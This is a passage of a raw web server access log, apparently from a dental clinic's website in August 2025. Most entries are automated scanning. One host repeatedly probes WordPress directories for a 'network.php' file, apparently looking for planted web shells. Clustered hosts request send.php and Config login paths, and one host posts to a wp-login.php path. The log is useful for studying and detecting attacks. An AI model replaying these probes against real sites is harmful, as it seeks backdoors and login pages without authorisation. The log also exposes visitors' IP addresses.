Safari/604.1" 170.64.252.169 - - [12/Aug/2025:22:55:15 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:55:53 -0400] "GET /wp-includes/rest-api/network.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:57:03 -0400] "GET /wp-admin/images/network.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:22:57:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:22:57:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:22:57:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:22:57:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:58:02 -0400] "GET /wp-includes/block-supports/network.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:22:58:57 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:22:58:57 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:22:58:57 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:22:58:57 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:22:59:15 -0400] "GET /wp-includes/network.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 31.13.103.4 - - [12/Aug/2025:22:59:58 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 4.43.184.114 - - [12/Aug/2025:23:00:44 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" 94.16.113.252 - - [12/Aug/2025:23:00:57 -0400] "GET /wp-includes/js/network.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:23:02:17 -0400] "GET /.well-known/pki-validation/network.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 190.92.174.33 - - [12/Aug/2025:23:02:35 -0400] "GET / HTTP/1.1" 301 231 "https://www.google.com.sg" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 94.16.113.252 - - [12/Aug/2025:23:03:08 -0400] "GET /wp-includes/css/network.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:23:03:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:23:03:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:23:03:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:23:04:32 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:23:05:46 -0400] "GET /wp-admin/network/network.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:23:07:24 -0400] "GET /wp-includes/PHPMailer/network.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:23:08:38 -0400] "GET /wp-includes/blocks/network.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:23:09:54 -0400] "GET /wp-includes/Text/network.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:23:11:49 -0400] "GET /wp-includes/Requests/network.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:23:12:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:23:12:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:23:12:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:23:12:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:23:13:16 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:23:13:17 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:23:13:17 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:23:13:17 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:23:13:18 -0400] "GET /wp-admin/user/network.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:23:17:04 -0400] "GET /.well-known/network.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 66.249.74.15 - - [12/Aug/2025:23:17:08 -0400] "GET /assets/img/All%20on%20four.webp HTTP/1.1" 301 266 "-" "Googlebot-Image/1.0" 94.16.113.252 - - [12/Aug/2025:23:18:26 -0400] "GET /wp-content/uploads/network.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:23:20:10 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:23:20:10 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:23:20:29 -0400] "GET /wp-content/themes/hideo/network.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 156.146.41.214 - - [12/Aug/2025:23:20:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 160.187.210.83 - - [12/Aug/2025:23:20:46 -0400] "GET /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "www.orthosquare.in/dental-tourism/teeth-implant/wp-login.php" "Mozilla/5.0" 160.187.210.83 - - [12/Aug/2025:23:20:49 -0400] "POST /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "www.orthosquare.in/dental-tourism/teeth-implant/wp-login.php" "Mozilla/5.0" 149.22.91.139 - - [12/Aug/2025:23:20:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:23:24:43 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:23:24:44 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:23:24:44 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:23:24:44 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"